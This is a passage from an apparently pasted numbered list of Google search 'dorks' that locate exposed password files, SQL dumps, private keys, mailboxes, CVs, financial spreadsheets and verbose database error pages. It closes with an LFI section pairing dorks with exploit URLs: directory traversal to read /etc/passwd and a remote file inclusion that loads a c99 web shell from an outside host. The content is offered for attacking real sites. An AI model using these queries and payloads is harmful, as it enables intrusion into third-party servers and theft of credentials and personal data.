  764. phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php (0.9.6
  765. | 0.9.7)
  766. Quicksite demopages for Typo3
  767. ReMOSitory module for Mambo
  768. uploadpics.php?did= -forumintext:Generated.by.phpix.1.0? inurl:$mode=album
  769. vBulletin version 3.0.1 newreply.php XSS
  770. VP-ASP Shopping Cart XSS
  771. WEBalbum 2004-2006 duda -ihackstuff -exploit
  772. WebAPP directory traversal
  773.  
  774.  
  775. "A syntax error has occurred" filetype:ihtml
  776. "access denied for user" "using password"
  777. "An illegal character has been found in the statement" -"previous message"
  778. "ASP.NET_*******Id" "data source="
  779. "Can't connect to local" intitle:warning
  780. "Chatologica MetaSearch" "stack tracking"
  781. "detected an internal error [IBM][CLI Driver][DB2/6000]"
  782. "error found handling the request" cocoon filetype:xml
  783. "Fatal error: Call to undefined function" -reply -the -next
  784. "Incorrect syntax near"
  785. "Incorrect syntax near"
  786. "Internal Server Error" "server at"
  787. "Invision Power Board Database Error"
  788. "ORA-00933: SQL command not properly ended"
  789. "ORA-12541: TNS:no listener" intitle:"error occurred"
  790. "Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php
  791. "PostgreSQL query failed: ERROR: parser: parse error"
  792. "Supplied argument is not a valid MySQL result resource"
  793. "Syntax error in query expression " -the
  794. "The script whose uid is " "is not allowed to access"
  795. "There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser."
  796. "Unable to jump to row" "on MySQL result index" "on line"
  797. "Unclosed quotation mark before the character string"
  798. "Warning: Bad arguments to (join|implode) () in" "on line" -help -forum
  799. "Warning: Cannot modify header information - headers already sent"
  800. "Warning: Division by zero in" "on line" -forum
  801. "Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum
  802. "Warning: mysql_query()" "invalid query"
  803. "Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"
  804. "Warning: Supplied argument is not a valid File-Handle resource in"
  805. "Warning:" "failed to open stream: HTTP request failed" "on line"
  806. "Warning:" "SAFE MODE Restriction in effect." "The script whose uid is" "is not allowed to access owned by uid 0 in" "on line"
  807. "SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"
  808. An unexpected token "END-OF-STATEMENT" was found
  809. Coldfusion Error Pages
  810. filetype:asp + "[ODBC SQL"
  811. filetype:asp "Custom Error Message" Category Source
  812. filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"
  813. filetype:php inurl:"logging.php" "Discuz" error
  814. IIS 4.0 error messages
  815. IIS web server error messages
  816. Internal Server Error
  817. intext:"Error Message : Error loading required libraries."
  818. intext:"Warning: Failed opening" "on line" "include_path"
  819. intitle:"Apache Tomcat" "Error Report"
  820. intitle:"Default PLESK Page"
  821. intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm
  822. intitle:"Error Occurred" "The error occurred in" filetype:cfm
  823. intitle:"Error using Hypernews" "Server Software"
  824. intitle:"Execution of this script not permitted"
  825. intitle:"Under construction" "does not currently have"
  826. intitle:Configuration.File inurl:softcart.exe
  827. MYSQL error message: supplied argument....
  828. mysql error with query
  829. Netscape Application Server Error page
  830. ORA-00921: unexpected end of SQL command
  831. ORA-00921: unexpected end of SQL command
  832. ORA-00936: missing expression
  833. PHP application warnings failing "include_path"
  834. sitebuildercontent
  835. sitebuilderfiles
  836. sitebuilderpictures
  837. Snitz! forums db path error
  838. SQL syntax error
  839. Supplied argument is not a valid PostgreSQL result
  840. warning "error on line" php sablotron
  841. Windows 2000 web server error messages
  842.  
  843.  
  844. intitle:"D ocuShare" inurl:"docushare/dsweb/" -faq -gov -edu
  845. "#mysql dump" filetype:sql
  846. "#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3
  847. "allow_call_time_pass_reference" "PATH_INFO"
  848. "Certificate Practice Statement" inurl:(PDF | DOC)
  849. "Generated by phpSystem"
  850. "generated by wwwstat"
  851. "Host Vulnerability Summary Report"
  852. "HTTP_FROM=googlebot" googlebot.com "Server_Software="
  853. "Index of" / "chat/logs"
  854. "Installed Objects Scanner" inurl:default.asp
  855. "MacHTTP" filetype:log inurl:machttp.log
  856. "Mecury Version" "Infastructure Group"
  857. "Microsoft ® Windows * ™ Version * DrWtsn32 Copyright ©" ext:log
  858. "Most Submitted Forms and Scripts" "this section"
  859. "Network Vulnerability Assessment Report"
  860. "not for distribution" confidential
  861. "not for public release" -.edu -.gov -.mil
  862. "phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
  863. "phpMyAdmin" "running on" inurl:"main.php"
  864. "produced by getstats"
  865. "Request Details" "Control Tree" "Server Variables"
  866. "robots.txt" "Disallow:" filetype:txt
  867. "Running in Child mode"
  868. "sets mode: +p"
  869. "sets mode: +s"
  870. "Thank you for your order" +receipt
  871. "This is a Shareaza Node"
  872. "This report was generated by WebLog"
  873. ( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject
  874. (intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results")
  875. (intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob
  876. (inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt
  877. +":8080" +":3128" +":80" filetype:txt
  878. +"HSTSNR" -"netop.com"
  879. -site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp
  880. AIM buddy lists
  881. allinurl:/examples/jsp/snp/snoop.jsp
  882. allinurl:cdkey.txt
  883. allinurl:servlet/SnoopServlet
  884. cgiirc.conf
  885. cgiirc.conf
  886. contacts ext:wml
  887. data filetype:mdb -site:gov -site:mil
  888. exported email addresses
  889. ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential
  890. ext:asp inurl:pathto.asp
  891. ext:ccm ccm -catacomb
  892. ext:CDX CDX
  893. ext:cgi inurl:editcgi.cgi inurl:file=
  894. ext:conf inurl:rsyncd.conf -cvs -man
  895. ext:conf NoCatAuth -cvs
  896. ext:dat bpk.dat
  897. extbiggrinBF DBF
  898. extbiggrinCA DCA
  899. ext:gho gho
  900. ext:ics ics
  901. ext:ini intext:env.ini
  902. ext:jbf jbf
  903. ext:ldif ldif
  904. ext:log "Software: Microsoft Internet Information Services *.*"
  905. ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
  906. ext:nsf nsf -gov -mil
  907. ext:plist filetype:plist inurl:bookmarks.plist
  908. ext:pqi pqi -database
  909. ext:reg "username=*" putty
  910. ext:txt "Final encryption key"
  911. ext:txt inurl:dxdiag
  912. ext:vmdk vmdk
  913. ext:vmx vmx
  914.  
  915.  
  916. filetype:asp DBQ=" * Server.MapPath("*.mdb")
  917. filetype:bkf bkf
  918. filetype:blt "buddylist"
  919. filetype:blt blt +intext:screenname
  920. filetype:cfg auto_inst.cfg
  921. filetype:cnf inurl:_vti_pvt access.cnf
  922. filetype:conf inurl:firewall -intitle:cvs
  923. filetype:config web.config -CVS
  924. filetype:ctt Contact
  925. filetype:ctt ctt messenger
  926. filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"
  927. filetype:fp3 fp3
  928. filetype:fp5 fp5 -site:gov -site:mil -"cvs log"
  929. filetype:fp7 fp7
  930. filetype:inf inurl:capolicy.inf
  931. filetype:lic lic intext:key
  932. filetype:log access.log -CVS
  933. filetype:log cron.log
  934. filetype:mbx mbx intext:Subject
  935. filetype:myd myd -CVS
  936. filetype:ns1 ns1
  937. filetype:ora ora
  938. filetype:ora tnsnames
  939. filetype:pdb pdb backup (Pilot | Pluckerdb)
  940. filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net
  941. filetype:pot inurl:john.pot
  942. filetype:PS ps
  943. filetype:pst inurl:"outlook.pst"
  944. filetype:pst pst -from -to -date
  945. filetype:qbb qbb
  946. filetype:QBW qbw
  947. filetype:rdp rdp
  948. filetype:reg "Terminal Server Client"
  949. filetype:vcs vcs
  950. filetype:wab wab
  951. filetype:xls -site:gov inurl:contact
  952. filetype:xls inurl:"email.xls"
  953. Financial spreadsheets: finance.xls
  954. Financial spreadsheets: finances.xls
  955. Ganglia Cluster Reports
  956. haccess.ctl (one way)
  957. haccess.ctl (VERY reliable)
  958. ICQ chat logs, please...
  959. intext:"******* Start * * * *:*:* *" filetype:log
  960. intext:"Tobias Oetiker" "traffic analysis"
  961. intext:(password | passcode) intext:(username | userid | user) filetype:csv
  962. intext:gmail invite intext:http://gmail.google.com/gmail/a
  963. intext:SQLiteManager inurl:main.php
  964. intext:ViewCVS inurl:Settings.php
  965. intitle:"admin panel" +"Powered by RedKernel"
  966. intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)
  967. intitle:"AppServ Open Project" -site:www.appservnetwork.com
  968. intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
  969. intitle:"Big Sister" +"OK Attention Trouble"
  970. intitle:"curriculum vitae" filetype:doc
  971. intitle:"edna:streaming mp3 server" -forums
  972. intitle:"FTP root at"
  973. intitle:"index of" +myd size
  974. intitle:"Index Of" -inurl:maillog maillog size
  975. intitle:"Index Of" cookies.txt size
  976. intitle:"index of" mysql.conf OR mysql_config
  977. intitle:"Index of" upload size parent directory
  978. intitle:"index.of *" admin news.asp configview.asp
  979. intitle:"index.of" .diz .nfo last modified
  980. intitle:"Joomla - Web Installer"
  981. intitle:"LOGREP - Log file reporting system" -site:itefix.no
  982. intitle:"Multimon UPS status page"
  983. intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )
  984. intitle:"PhpMyExplorer" inurl:"index.php" -cvs
  985.  
  986. intitle:"statistics of" "advanced web statistics"
  987. intitle:"System Statistics" +"System and Network Information Center"
  988. intitle:"urchin (5|3|admin)" ext:cgi
  989. intitle:"Usage Statistics for" "Generated by Webalizer"
  990. intitle:"wbem" compaq login "Compaq Information Technologies Group"
  991. intitle:"Web Server Statistics for ****"
  992. intitle:"web server status" SSH Telnet
  993. intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"
  994. intitle:"welcome.to.squeezebox"
  995. intitle:admin intitle:login
  996. intitle:Bookmarks inurl:bookmarks.html "Bookmarks
  997. intitle:index.of "Apache" "server at"
  998. intitle:index.of cleanup.log
  999. intitle:index.of dead.letter
  1000. intitle:index.of inbox
  1001. intitle:index.of inbox dbx
  1002. intitle:index.of ws_ftp.ini
  1003. intitle:intranet inurl:intranet +intext:"phone"
  1004. inurl:"/axs/ax-admin.pl" -script
  1005. inurl:"/cricket/grapher.cgi"
  1006. inurl:"bookmark.htm"
  1007. inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM
  1008. inurl:"newsletter/admin/"
  1009. inurl:"newsletter/admin/" intitle:"newsletter admin"
  1010. inurl:"putty.reg"
  1011. inurl:"smb.conf" intext:"workgroup" filetype:conf conf
  1012. inurl:*db filetype:mdb
  1013. inurl:/cgi-bin/pass.txt
  1014. inurl:/_layouts/settings
  1015. inurl:admin filetype:xls
  1016. inurl:admin intitle:login
  1017. inurl:backup filetype:mdb
  1018. inurl:build.err
  1019. inurl:cgi-bin/printenv
  1020. inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
  1021. inurl:changepassword.asp
  1022. inurl:ds.py
  1023. inurl:email filetype:mdb
  1024. inurl:fcgi-bin/echo
  1025. inurl:forum filetype:mdb
  1026. inurl:forward filetype:forward -cvs
  1027. inurl:getmsg.html intitle:hotmail
  1028. inurl:log.nsf -gov
  1029. inurl:main.php phpMyAdmin
  1030. inurl:main.php Welcome to phpMyAdmin
  1031. inurl:netscape.hst
  1032. inurl:netscape.hst
  1033. inurl:netscape.ini
  1034. inurl:odbc.ini ext:ini -cvs
  1035. inurl:perl/printenv
  1036. inurl:php.ini filetype:ini
  1037. inurl:preferences.ini "[emule]"
  1038. inurl:profiles filetype:mdb
  1039. inurl:report "EVEREST Home Edition "
  1040. inurl:server-info "Apache Server Information"
  1041. inurl:server-status "apache"
  1042. inurl:snitz_forums_2000.mdb
  1043. inurl:ssl.conf filetype:conf
  1044. inurl:tdbin
  1045. inurl:vbstats.php "page generated"
  1046. inurl:wp-mail.php + "There doesn't seem to be any new mail."
  1047. inurl:XcCDONTS.asp
  1048. ipsec.conf
  1049. ipsec.secrets
  1050. ipsec.secrets
  1051. Lotus Domino address books
  1052. mail filetype:csv -site:gov intext:name
  1053. Microsoft Money Data Files
  1054. mt-db-pass.cgi files
  1055. MySQL tabledata dumps
  1056. mystuff.xml - Trillian data files
  1057. OWA Public Folders (direct view)
  1058. Peoples MSN contact lists
  1059. php-addressbook "This is the addressbook for *" -warning
  1060. phpinfo()
  1061. phpMyAdmin dumps
  1062. phpMyAdmin dumps
  1063.  
  1064. phpMyAdmin dumps
  1065. phpMyAdmin dumps
  1066. private key files (.csr)
  1067. private key files (.key)
  1068. Quicken data files
  1069. rdbqds -site:.edu -site:.mil -site:.gov
  1070. robots.txt
  1071. site:edu admin grades
  1072. site:www.mailinator.com inurl:ShowMail.do
  1073. SQL data dumps
  1074. Squid cache server reports
  1075. Unreal IRCd
  1076. WebLog Referrers
  1077. Welcome to ntop!
  1078.  
  1079. "admin account info" filetype:log
  1080. !Host=*.* intext:enc_UserPassword=* ext:pcf
  1081. "# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
  1082. "AutoCreate=TRUE password=*"
  1083. "http://*:*@www" domainname
  1084. "index of/" "ws_ftp.ini" "parent directory"
  1085. "liveice configuration file" ext:cfg -site:sourceforge.net
  1086. "parent directory" +proftpdpasswd
  1087. "powered by ducalendar" -site:duware.com
  1088. "Powered by Duclassified" -site:duware.com
  1089. "Powered by Duclassified" -site:duware.com "DUware All Rights reserved"
  1090. "powered by duclassmate" -site:duware.com
  1091. "Powered by Dudirectory" -site:duware.com
  1092. "powered by dudownload" -site:duware.com
  1093. "Powered By Elite Forum Version *.*"
  1094. "Powered by Link Department"
  1095. "sets mode: +k"
  1096. "your password is" filetype:log
  1097. "Powered by DUpaypal" -site:duware.com
  1098. allinurl: admin mdb
  1099. auth_user_file.txt
  1100. config.php
  1101. eggdrop filetype:user user
  1102. enable password | secret "current configuration" -intext:the
  1103. etc (index.of)
  1104. ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn
  1105. ext:inc "pwd=" "UID="
  1106. ext:ini eudora.ini
  1107. ext:ini Version=4.0.0.4 password
  1108. ext:passwd -intext:the -sample -example
  1109. ext:txt inurl:unattend.txt
  1110. ext:yml database inurl:config
  1111. filetype:bak createobject sa
  1112.  
  1113.  
  1114. filetype:bak inurl:"htaccess|passwd|shadow|htusers"
  1115. filetype:cfg mrtg "target
  1116. " -sample -cvs -example
  1117. filetype:cfm "cfapplication name" password
  1118. filetype:conf oekakibbs
  1119. filetype:conf slapd.conf
  1120. filetype:config config intext:appSettings "User ID"
  1121. filetype:dat "password.dat"
  1122. filetype:dat inurl:Sites.dat
  1123. filetype:dat wand.dat
  1124. filetype:inc dbconn
  1125. filetype:inc intext:mysql_connect
  1126. filetype:inc mysql_connect OR mysql_pconnect
  1127. filetype:inf sysprep
  1128. filetype:ini inurl:"serv-u.ini"
  1129. filetype:ini inurl:flashFXP.ini
  1130. filetype:ini ServUDaemon
  1131. filetype:ini wcx_ftp
  1132. filetype:ini ws_ftp pwd
  1133. filetype:ldb admin
  1134. filetype:log "See `ipsec --copyright"
  1135. filetype:log inurl:"password.log"
  1136. filetype:mdb inurl:users.mdb
  1137. filetype:mdb wwforum
  1138. filetype:netrc password
  1139. filetype:pass pass intext:userid
  1140. filetype:pem intext:private
  1141. filetype:properties inurl:db intext:password
  1142. filetype:pwd service
  1143. filetype:pwl pwl
  1144. filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
  1145. filetype:reg reg +intext:”WINVNC3”
  1146. filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
  1147. filetype:sql "insert into" (pass|passwd|password)
  1148. filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
  1149. filetype:sql ("passwd values" | "password values" | "pass values" )
  1150. filetype:sql +"IDENTIFIED BY" -cvs
  1151. filetype:sql password
  1152. filetype:url +inurl:"ftp://" +inurl:";@"
  1153. filetype:xls username password email
  1154. htpasswd
  1155. htpasswd / htgroup
  1156. htpasswd / htpasswd.bak
  1157. intext:"enable password 7"
  1158. intext:"enable secret 5 $"
  1159. intitle:"index of" intext:connect.inc
  1160. intitle:"index of" intext:globals.inc
  1161. intitle:"Index of" passwords modified
  1162. intitle:"Index of" sc_serv.conf sc_serv content
  1163. intitle:"phpinfo()" +"mysql.default_password" +"Zend Scripting Language Engine"
  1164. intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
  1165. intitle:index.of administrators.pwd
  1166. intitle:Index.of etc shadow
  1167.  
  1168. intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
  1169. intitle:rapidshare intext:login
  1170. inurl:"calendarscript/users.txt"
  1171. inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
  1172. inurl:"GRC.DAT" intext:"password"
  1173. inurl:"Sites.dat"+"PASS="
  1174. inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
  1175. inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
  1176. inurl:"wvdial.conf" intext:"password"
  1177. inurl:/db/main.mdb
  1178. inurl:/wwwboard
  1179. inurl:/yabb/Members/Admin.dat
  1180. inurl:ccbill filetype:log
  1181. inurl:cgi-bin inurl:calendar.cfg
  1182. inurl:chap-secrets -cvs
  1183. inurl:config.php dbuname dbpass
  1184. inurl:filezilla.xml -cvs
  1185. inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
  1186. inurl:nuke filetype:sql
  1187. inurl:ospfd.conf intext:password -sample -test -tutorial -download
  1188. inurl:pap-secrets -cvs
  1189. inurl:pass.dat
  1190. inurl:perform filetype:ini
  1191. inurl:perform.ini filetype:ini
  1192. inurl:secring ext:skr | ext:pgp | ext:bak
  1193. inurl:server.cfg rcon password
  1194. inurl:ventrilo_srv.ini adminpassword
  1195. inurl:vtund.conf intext:pass -cvs
  1196. inurl:zebra.conf intext:password -sample -test -tutorial -download
  1197. LeapFTP intitle:"index.of./" sites.ini modified
  1198. master.passwd
  1199. mysql history files
  1200. NickServ registration passwords
  1201. passlist
  1202. passlist.txt (a better way)
  1203. passwd
  1204. passwd / etc (reliable)
  1205. people.lst
  1206. psyBNC config files
  1207. pwd.db
  1208. server-dbs "intitle:index of"
  1209. signin filetype:url
  1210. spwd.db / passwd
  1211. trillian.ini
  1212. wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
  1213. [WFClient] Password= filetype:ica
  1214.  
  1215. "inde x of" / lck
  1216. +intext:"webalizer" +intext:"Total Usernames" +intext:"Usage Statistics for"
  1217. bash_history files
  1218. filetype:conf inurl:proftpd.conf -sample
  1219. filetype:log username putty
  1220. filetype:reg reg +intext:"internet account manager"
  1221. filetype:reg reg HKEY_CURRENT_USER username
  1222. index.of perform.ini
  1223. intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"
  1224. inurl:admin filetype:asp inurl:userlist
  1225. inurl:admin inurl:userlist
  1226. inurl:php inurl:hlstats intext:"Server Username"
  1227. OWA Public folders & Address book
  1228. sh_history files
  1229.  
  1230.  
  1231.  
  1232. ________________________ LFI ________________________
  1233.  
  1234. Dork :: inurl:"com_phpshop"
  1235. Exploit :: administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=h ttp://santaj.t35.com/c99.txt?
  1236. ________________________
  1237.  
  1238. Dork :: inurl:index.php fees shop link.codes merchantAccount
  1239. Exploit :: index.php?read=../../../../../../../../../../../../../../etc/passwd
  1240.  
  1241. Dork :: inurl:eStore/index.cgi?
  1242. Exploit :: eStore/index.cgi?page=../../../../../../../../etc/passwd
  1243. or :: index.cgi?page=../../../../../../../../etc/passwd
  1244.  
  1245. /etc/shadow
  1246. /etc/secure
  1247. /etc/group
  1248. /etc/security/group
Add Comment
Please, Sign In to add comment